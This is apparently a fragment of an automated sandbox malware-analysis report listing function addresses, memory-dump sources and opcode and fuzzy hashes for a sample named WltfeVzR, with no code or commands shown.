                        • Instruction ID: 880d8ac8c8b120893a19bbe2283a78164b7595b3fd18a8cc70e715f2f9dd5b90
                        • Opcode Fuzzy Hash: bc69e413c40db1beb5534dc2d52ba4a4b32c00f54e8d39a00c58004fd9522b65
                        • Instruction Fuzzy Hash: 3F1131F5914345EFCB06CF64E4C0B26BB61FBC4318F64CAAEEA494B256C336D406CA61
                        Function 0123D2EF Relevance: .1, Instructions: 53COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000010.00000002.2315625253.000000000123D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0123D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_123d000_WltfeVzR.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6571a979d86382cef3f3a0ee6dcd591210bcaba3c37dfea3d6794a8d99f67603
                        • Instruction ID: 55b60cd3a5ea527620b459049bf23d5d8a3080db570e2a334c03164a0072c2d0
                        • Opcode Fuzzy Hash: 6571a979d86382cef3f3a0ee6dcd591210bcaba3c37dfea3d6794a8d99f67603
                        • Instruction Fuzzy Hash: AD119DB6504284CFDB12CF54D5C4B19BF62FB84324F24C6AAD9494B656C33AD84ACFA2
                        Function 0123D546 Relevance: .0, Instructions: 45COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000010.00000002.2315625253.000000000123D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0123D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_123d000_WltfeVzR.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9e75dc762ef4788644238b5ccb72569e73599ade6f6583d5c92e1dd4d6de74a9
                        • Instruction ID: cafc0771a0a6885f9a12eaeea80d7bbf3f197821bb7c1ba26ca07c4c2b579746
                        • Opcode Fuzzy Hash: 9e75dc762ef4788644238b5ccb72569e73599ade6f6583d5c92e1dd4d6de74a9
                        • Instruction Fuzzy Hash: 34118BB55002449FCB06CF54E5C4B16BF62FB85228F68C6AAD94A0F25BC336D516CBA2

                        Non-executed Functions

                        Function 065A0D50 Relevance: 10.3, Strings: 8, Instructions: 296COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.2332959806.00000000065A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_65a0000_WltfeVzR.jbxd
                        Similarity
                        • API ID:
                        • String ID: $sq$$sq$$sq$$sq$$sq$$sq$$sq$$sq
                        • API String ID: 0-3003498
                        • Opcode ID: 0f679665004c03ae63ad0edacf20289fcb70376f84ccaba757eedd66e7f48bde
                        • Instruction ID: e2e6e32fa1273ab96b4925402fb083f7a48d3f531bc02b32fb2920d2a4dc3483
                        • Opcode Fuzzy Hash: 0f679665004c03ae63ad0edacf20289fcb70376f84ccaba757eedd66e7f48bde
                        • Instruction Fuzzy Hash: 1DB1BD34B142859FDB55DB69C8949BEBBF2BF88304F14846AE406DB3A1DB31DC52CB90